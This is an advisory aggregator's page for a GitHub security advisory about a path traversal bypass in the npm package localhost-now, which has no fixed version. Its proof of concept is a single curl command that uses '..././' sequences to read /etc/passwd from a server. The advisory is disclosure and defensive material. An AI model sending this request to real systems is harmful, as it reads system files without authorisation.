Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTczY3ctanhtbS1xcGdo
Path Traversal in localhost-now
All versions of localhost-now are vulnerable to path traversal. This vulnerability is a bypass to the path traversal fix introduced in version 1.0.2
Proof of concept:
$ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd"
Recommendation
No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.
Permalink: https://github.com/advisories/GHSA-73cw-jxmm-qpghJSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTczY3ctanhtbS1xcGdo
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 5 years ago
Updated: almost 2 years ago
Identifiers: GHSA-73cw-jxmm-qpgh
References:
- https://hackerone.com/reports/329837
- https://github.com/DCKT/localhost-now/blob/master/lib/app.js#L17
- https://www.npmjs.com/advisories/655
- https://github.com/advisories/GHSA-73cw-jxmm-qpgh
Blast Radius: 0.0
Affected Packages
npm:localhost-now
Dependent packages: 1Dependent repositories: 1
Downloads: 23 last month
Affected Version Ranges: <= 1.0.2
No known fixed version
All affected versions: 0.0.1, 0.0.2, 0.0.3, 0.1.0, 0.1.1, 0.1.2, 0.1.3, 0.1.4, 1.0.0, 1.0.1, 1.0.2